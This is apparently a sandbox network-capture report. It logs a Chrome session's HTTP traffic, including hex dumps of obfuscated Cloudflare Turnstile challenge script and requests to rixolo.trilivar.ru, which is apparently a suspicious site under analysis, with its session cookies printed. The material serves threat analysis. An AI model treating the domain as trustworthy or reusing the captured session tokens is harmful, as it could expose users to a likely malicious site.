                                          2025-01-08 15:13:28 UTC1369INData Raw: 28 35 31 33 29 5d 5b 67 4a 28 37 32 32 29 5d 28 65 54 29 2c 65 4d 5b 67 4a 28 34 38 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 67 51 2c 69 2c 6a 2c 6b 2c 6c 2c 6f 2c 73 2c 76 2c 78 2c 42 2c 6d 29 7b 66 6f 72 28 67 51 3d 67 4a 2c 69 3d 7b 27 45 68 65 49 64 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 62 4b 65 5a 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 2c 27 45 7a 62 55 4d 27 3a 67 51 28 31 34 32 37 29 2c 27 45 76 54 6e 45 27 3a 67 51 28 35 33 36 29 2c 27 52 77 72 42 6f 27 3a 67 51 28 37 30 33 29 2c 27 6f 4c 4a 65 6d 27 3a 67 51 28 31 38 33 29 2c 27 69 4a 64 71 68 27 3a 67 51 28 31 35 37 31 29 2c 27 56 48 7a 6b 74 27 3a 67 51 28 31 34 32 38 29 2c 27 6f 6f 61 4a
                                          Data Ascii: (513)][gJ(722)](eT),eM[gJ(483)]=function(g,h,gQ,i,j,k,l,o,s,v,x,B,m){for(gQ=gJ,i={'EheId':function(n,o){return n+o},'bKeZZ':function(n,o){return n(o)},'EzbUM':gQ(1427),'EvTnE':gQ(536),'RwrBo':gQ(703),'oLJem':gQ(183),'iJdqh':gQ(1571),'VHzkt':gQ(1428),'ooaJ
                                          2025-01-08 15:13:28 UTC1369INData Raw: 2e 36 3c 3c 66 2c 33 32 29 2c 65 4d 5b 67 53 28 35 31 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 54 29 7b 67 54 3d 67 53 2c 65 4d 5b 65 5b 67 54 28 31 33 32 39 29 5d 5d 26 26 28 65 4d 5b 67 54 28 31 30 30 38 29 5d 5b 67 54 28 34 39 32 29 5d 28 29 2c 65 4d 5b 67 54 28 31 30 30 38 29 5d 5b 67 54 28 31 34 31 35 29 5d 28 29 2c 65 4d 5b 67 54 28 31 35 31 36 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 67 54 28 31 33 30 35 29 5d 5b 67 54 28 31 33 30 37 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 67 54 28 35 34 39 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 67 54 28 31 32 34 38 29 5d 5b 67 54 28 32 34 31 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 67 54 28 31 31 36 34 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 67 54 28 31 32 34 38 29 5d 5b 67 54 28 36 38 31 29 5d 2c 27 63
                                          Data Ascii: .6<<f,32),eM[gS(512)](function(gT){gT=gS,eM[e[gT(1329)]]&&(eM[gT(1008)][gT(492)](),eM[gT(1008)][gT(1415)](),eM[gT(1516)]=!![],eM[gT(1305)][gT(1307)]({'source':gT(549),'widgetId':eM[gT(1248)][gT(241)],'event':e[gT(1164)],'cfChlOut':eM[gT(1248)][gT(681)],'c
                                          2025-01-08 15:13:28 UTC1369INData Raw: 61 73 65 27 39 27 3a 45 5b 67 55 28 38 35 34 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 45 5b 67 55 28 31 30 39 33 29 5d 28 43 2c 44 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 31 27 3a 67 5b 67 55 28 31 31 32 39 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 67 55 28 31 31 32 39 29 5d 3d 4a 53 4f 4e 5b 67 55 28 31 33 39 33 29 5d 28 67 5b 67 55 28 31 31 32 39 29 5d 2c 4f 62 6a 65 63 74 5b 67 55 28 37 36 36 29 5d 28 67 5b 67 55 28 31 31 32 39 29 5d 29 29 3a 67 5b 67 55 28 31 31 32 39 29 5d 3d 4a 53 4f 4e 5b 67 55 28 31 33 39 33 29 5d 28 67 5b 67 55 28 31 31 32 39 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 46 3d 6b 5b 67 55 28 31 31 35 31 29 5d 28 69 2c 67 55 28 35
                                          Data Ascii: ase'9':E[gU(854)]=5e3;continue;case'10':E[gU(1093)](C,D,!![]);continue;case'11':g[gU(1129)]instanceof Error?g[gU(1129)]=JSON[gU(1393)](g[gU(1129)],Object[gU(766)](g[gU(1129)])):g[gU(1129)]=JSON[gU(1393)](g[gU(1129)]);continue;case'12':F=k[gU(1151)](i,gU(5
                                          2025-01-08 15:13:28 UTC1369INData Raw: 28 31 31 31 31 29 5d 3d 3d 3d 67 56 28 34 33 38 29 29 7b 66 6f 72 28 73 3d 65 5b 67 56 28 33 36 34 29 5d 5b 67 56 28 37 32 37 29 5d 28 27 7c 27 29 2c 76 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 73 5b 76 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 61 34 5b 65 5b 67 56 28 34 33 33 29 5d 28 61 35 2c 35 29 5d 7c 3d 31 32 38 2e 30 36 3c 3c 32 34 2d 61 36 25 33 32 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 61 37 5b 28 61 38 2b 36 34 3e 3e 39 2e 35 39 3c 3c 34 29 2b 31 35 5d 3d 61 39 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 43 3d 28 78 3d 5b 31 31 31 36 33 35 32 34 30 38 2c 31 38 39 39 34 34 37 34 34 31 2c 33 30 34 39 33 32 33 34 37 31 2c 33 39 32 31 30 30 39 35 37 33 2c 39 36 31 39 38 37 31 36 33 2c 31 35 30 38 39 37 30 39 39 33 2c
                                          Data Ascii: (1111)]===gV(438)){for(s=e[gV(364)][gV(727)]('|'),v=0;!![];){switch(s[v++]){case'0':a4[e[gV(433)](a5,5)]|=128.06<<24-a6%32;continue;case'1':a7[(a8+64>>9.59<<4)+15]=a9;continue;case'2':C=(x=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,
                                          2025-01-08 15:13:28 UTC1369INData Raw: 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 65 5b 67 56 28 34 33 32 29 5d 28 31 36 2c 45 29 3f 50 3d 62 6c 5b 45 2b 44 5d 3a 50 3d 28 50 3d 43 5b 65 5b 67 56 28 38 39 31 29 5d 28 45 2c 32 29 5d 2c 50 3d 65 5b 67 56 28 35 32 35 29 5d 28 65 5b 67 56 28 36 38 36 29 5d 28 62 4c 28 50 2c 31 37 29 2c 62 4d 28 50 2c 31 39 29 29 2c 50 3e 3e 3e 31 30 29 2c 50 3d 62 4e 28 50 2c 43 5b 45 2d 37 5d 29 2c 51 3d 43 5b 45 2d 31 35 5d 2c 51 3d 65 5b 67 56 28 31 35 31 31 29 5d 28 62 4f 28 51 2c 37 29 5e 62 50 28 51 2c 31 38 29 2c 51 3e 3e 3e 33 2e 33 29 2c 62 51 28 62 52 28 50 2c 51 29 2c 43 5b 65 5b 67 56 28 31 33 37 37 29 5d 28 45 2c 31 36 29 5d 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 4b 3d 4a 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27
                                          Data Ascii: continue;case'6':e[gV(432)](16,E)?P=bl[E+D]:P=(P=C[e[gV(891)](E,2)],P=e[gV(525)](e[gV(686)](bL(P,17),bM(P,19)),P>>>10),P=bN(P,C[E-7]),Q=C[E-15],Q=e[gV(1511)](bO(Q,7)^bP(Q,18),Q>>>3.3),bQ(bR(P,Q),C[e[gV(1377)](E,16)]));continue;case'7':K=J;continue;case'8'
                                          2025-01-08 15:13:28 UTC1369INData Raw: 4d 5b 67 58 28 34 30 31 29 5d 5b 67 58 28 31 35 33 29 5d 28 67 58 28 39 38 37 29 2c 64 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 58 3d 30 2c 66 30 3d 7b 7d 2c 66 30 5b 67 4a 28 31 31 32 34 29 5d 3d 65 5a 2c 65 4d 5b 67 4a 28 35 34 30 29 5d 3d 66 30 2c 66 32 3d 65 4d 5b 67 4a 28 31 32 34 38 29 5d 5b 67 4a 28 37 33 39 29 5d 5b 67 4a 28 34 37 33 29 5d 2c 66 33 3d 65 4d 5b 67 4a 28 31 32 34 38 29 5d 5b 67 4a 28 37 33 39 29 5d 5b 67 4a 28 31 31 31 39 29 5d 2c 66 34 3d 65 4d 5b 67 4a 28 31 32 34 38 29 5d 5b 67 4a 28 37 33 39 29 5d 5b 67 4a 28 39 39 30 29 5d 2c 66 67 3d 21 5b 5d 2c 66 73 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 33 34 34 29 5d 28 67 4a 28 31 30 38 34 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 68 4a 2c 64 2c 65 29 7b 68 4a 3d 67 4a 2c
                                          Data Ascii: M[gX(401)][gX(153)](gX(987),d));return![]},eX=0,f0={},f0[gJ(1124)]=eZ,eM[gJ(540)]=f0,f2=eM[gJ(1248)][gJ(739)][gJ(473)],f3=eM[gJ(1248)][gJ(739)][gJ(1119)],f4=eM[gJ(1248)][gJ(739)][gJ(990)],fg=![],fs=undefined,eM[gJ(1344)](gJ(1084),function(c,hJ,d,e){hJ=gJ,
                                          2025-01-08 15:13:28 UTC1369INData Raw: 66 5a 5b 67 4a 28 31 32 36 35 29 5d 3d 66 6e 2c 66 5a 5b 67 4a 28 36 38 39 29 5d 3d 66 59 2c 66 5a 5b 67 4a 28 34 37 31 29 5d 3d 66 72 2c 66 5a 5b 67 4a 28 34 39 32 29 5d 3d 66 6f 2c 66 5a 5b 67 4a 28 36 35 35 29 5d 3d 66 6b 2c 66 5a 5b 67 4a 28 33 38 37 29 5d 3d 66 6a 2c 65 4d 5b 67 4a 28 31 30 30 38 29 5d 3d 66 5a 2c 67 30 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 69 6b 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 6b 3d 67 4a 2c 67 3d 7b 7d 2c 67 5b 69 6b 28 34 38 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 25 73 7d 2c 67 5b 69 6b 28 33 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 68 3d 67 2c 6d 2c 6a 3d 33 32 2c 6c 3d 65 4d 5b 69 6b 28 31 32 34 38 29 5d 5b 69
                                          Data Ascii: fZ[gJ(1265)]=fn,fZ[gJ(689)]=fY,fZ[gJ(471)]=fr,fZ[gJ(492)]=fo,fZ[gJ(655)]=fk,fZ[gJ(387)]=fj,eM[gJ(1008)]=fZ,g0=function(f,ik,g,h,i,j,k,l,m){for(ik=gJ,g={},g[ik(485)]=function(n,s){return n%s},g[ik(345)]=function(n,s){return n+s},h=g,m,j=32,l=eM[ik(1248)][i


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.549729104.18.94.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:28 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:28 UTC240INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:28 GMT
                                          Content-Type: image/png
                                          Content-Length: 61
                                          Connection: close
                                          cache-control: max-age=2629800, public
                                          Server: cloudflare
                                          CF-RAY: 8fed21bba82741af-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:28 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.549720104.21.33.34433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:29 UTC1322OUTGET /favicon.ico HTTP/1.1
                                          Host: rixolo.trilivar.ru
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://rixolo.trilivar.ru/mwAdur/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Cookie: XSRF-TOKEN=eyJpdiI6ImNzS1ZJdkxENGtoUElDUnRzNXoycFE9PSIsInZhbHVlIjoiVjA4bDNESk5nTFE0T1hCb2tZSlg1N3d1ZytCL29Zb3ZBSlQ5dHpCZnVFV3d2R0I2MEpuNmV2Nllnc2ZtenJRcm5Sb3d1empFWEtneUdDWnNqbTVJT3NTSkg0WGNzQUFPK05DUWxsdmc2ZHZMbWQzL3JPand6NER5L09LcHZ1ZWsiLCJtYWMiOiJkOThjYWQzYzk3ZDUyZmQyNGE1YmVjNzI0MWFlNjRjNmNhMDkyM2U2ZGVlMTQwNmZlZmFmODZlNDYzNzlkNzA1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZQNFR6cG9UZ1pyYjJCZTlTNGxidEE9PSIsInZhbHVlIjoiSjNoTG5OMHZ2TXA2QlZKMm90aDVCOUY2MHozcFBKTFdzbmowSG9SMWczR1Y3clNBYUZ5VVRJTi9IUTZBUXR5OWVWU2lkT1A1ZHhRWlVPalhKcGdjUmFkZUFOeE0xbGlSSHc5MGJLVndFeTNVK21mSlpLSlVwM3RxVUM2VjBYZFUiLCJtYWMiOiJlMzFmMmI5ODcwNmVkMGNjNTA1MzhlZDQwY2NhZTQ2M2IxZmJjYTYyY2FjMjIzNTQyZTk4MjliZjA0ZTdhNDkwIiwidGFnIjoiIn0%3D
                                          2025-01-08 15:13:29 UTC1068INHTTP/1.1 404 Not Found
                                          Date: Wed, 08 Jan 2025 15:13:29 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cache-Control: max-age=14400
                                          Age: 6895
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Box6U4xdR9TgzUo88iY9QlyFAFrnbz447mwNzfTkbFmI7sIhUI8iNwtK%2B1KP8QbUj9u23mi81qn9kzXM9FBup1DahQBj7IqFkTk3QIRX2ntCdlQab0NS%2Bqgftq5MQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Vary: Accept-Encoding
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=47972&min_rtt=47749&rtt_var=13764&sent=5&recv=8&lost=0&retrans=1&sent_bytes=4249&recv_bytes=2257&delivery_rate=22243&cwnd=251&unsent_bytes=0&cid=109b5dd2bdd92949&ts=128&x=0"
                                          CF-Cache-Status: HIT
                                          Server: cloudflare
                                          CF-RAY: 8fed21be885d8cc8-EWR
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=1982&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1900&delivery_rate=1473259&cwnd=237&unsent_bytes=0&cid=61926b2534517cb9&ts=4080&x=0"
                                          2025-01-08 15:13:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.549730104.18.95.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:29 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:29 UTC240INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:29 GMT
                                          Content-Type: image/png
                                          Content-Length: 61
                                          Connection: close
                                          cache-control: max-age=2629800, public
                                          Server: cloudflare
                                          CF-RAY: 8fed21bface7726f-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:29 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.549731104.18.95.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:29 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fed21b6fd66c343&lang=auto HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:29 UTC331INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:29 GMT
                                          Content-Type: application/javascript; charset=UTF-8
                                          Content-Length: 116974
                                          Connection: close
                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          Server: cloudflare
                                          CF-RAY: 8fed21c15dd680d6-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:29 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https
                                          2025-01-08 15:13:29 UTC1369INData Raw: 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65
                                          Data Ascii: %20longer%20available","turnstile_footer_privacy":"Privacy","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site
                                          2025-01-08 15:13:29 UTC1369INData Raw: 66 45 2c 66 4f 2c 66 5a 2c 67 33 2c 67 36 2c 67 37 2c 67 78 2c 67 45 2c 67 34 2c 67 35 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 39 32 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 36 35 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 36 35 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 34 30 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 37 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 32 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 34 32 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 34
                                          Data Ascii: fE,fO,fZ,g3,g6,g7,gx,gE,g4,g5){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(927))/1+-parseInt(gI(865))/2+-parseInt(gI(1665))/3+parseInt(gI(1740))/4*(-parseInt(gI(567))/5)+-parseInt(gI(1162))/6+parseInt(gI(1842))/7+parseInt(gI(64
                                          2025-01-08 15:13:29 UTC1369INData Raw: 54 43 65 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 68 3d 3d 3d 6e 75 6c 6c 7c 7c 68 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 65 57 28 68 29 2c 67 5b 67 5a 28 31 38 37 31 29 5d 5b 67 5a 28 31 36 34 37 29 5d 26 26 28 78 3d 78 5b 67 5a 28 31 37 39 36 29 5d 28 67 5b 67 5a 28 31 38 37 31 29 5d 5b 67 5a 28 31 36 34 37 29 5d 28 68 29 29 29 2c 78 3d 67 5b 67 5a 28 39 32 31 29 5d 5b 67 5a 28 35 36 33 29 5d 26 26 67 5b 67 5a 28 31 37 35 33 29 5d 3f 67 5b 67 5a 28 39 32 31 29 5d 5b 67 5a 28 35 36 33 29 5d 28 6e 65 77 20 67 5b 28 67 5a 28 31 37 35 33 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 31 2c 48 29 7b 66 6f 72 28 68 31 3d 67 5a 2c 47 5b 68 31 28 31 33
                                          Data Ascii: TCe':function(G,H,I){return G(H,I)}},h===null||h===void 0)return j;for(x=eW(h),g[gZ(1871)][gZ(1647)]&&(x=x[gZ(1796)](g[gZ(1871)][gZ(1647)](h))),x=g[gZ(921)][gZ(563)]&&g[gZ(1753)]?g[gZ(921)][gZ(563)](new g[(gZ(1753))](x)):function(G,h1,H){for(h1=gZ,G[h1(13
                                          2025-01-08 15:13:29 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 46 4c 51 63 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 68 32 28 38 34 37 29 5d 28 68 29 2c 6b 3d 30 3b 69 5b 68 32 28 31 30 35 32 29 5d 28 6b 2c 6a 5b 68 32 28 31 31 37 31 29 5d 29 3b 6b 2b 2b 29 69 66 28 6c 3d 6a 5b 6b 5d 2c 27 66 27 3d 3d 3d 6c 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 6d 3c 68 5b 6a 5b 6b 5d 5d 5b 68 32 28 31 31 37 31 29 5d 3b 2d 31 3d 3d 3d 67 5b 6c 5d 5b 68 32 28 31 35 36 39 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 26 26 28 69 5b 68 32 28 35 35 38 29 5d 28 65 59 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 68 32 28 36 37 31 29 5d 28 27 6f
                                          Data Ascii: unction(n,o){return n<o},'FLQcJ':function(n,o){return n(o)}},j=Object[h2(847)](h),k=0;i[h2(1052)](k,j[h2(1171)]);k++)if(l=j[k],'f'===l&&(l='N'),g[l]){for(m=0;m<h[j[k]][h2(1171)];-1===g[l][h2(1569)](h[j[k]][m])&&(i[h2(558)](eY,h[j[k]][m])||g[l][h2(671)]('o
                                          2025-01-08 15:13:29 UTC1369INData Raw: 53 27 3a 65 4d 5b 68 35 28 31 33 38 38 29 5d 5b 68 35 28 31 38 38 30 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 68 35 28 31 31 37 37 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 68 35 28 31 33 38 38 29 5d 5b 68 35 28 31 31 34 33 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 36 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 36 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 3d 28 68 36 3d 67 4a 2c 7b 27 43 57 69 68 54 27 3a 68 36 28 31 30 31 32 29 2c 27 58 65 42 63 72 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 46 63 55 4d 59 27 3a 68 36 28 31 34 35 39 29 2c 27 71 49 75 68 4a 27 3a 68 36 28 31 30 33 35 29 2c 27 47 75 4e 6e 4b 27 3a 66 75 6e 63 74 69
                                          Data Ascii: S':eM[h5(1388)][h5(1880)],'code':e[h5(1177)],'rcV':eM[h5(1388)][h5(1143)]},'*'))},g)},eM[gJ(1645)]=function(f,g,h,h6,i,j,k,l,m,n,o,s,x,B,C,D,E,F){i=(h6=gJ,{'CWihT':h6(1012),'XeBcr':function(G,H){return G+H},'FcUMY':h6(1459),'qIuhJ':h6(1035),'GuNnK':functi
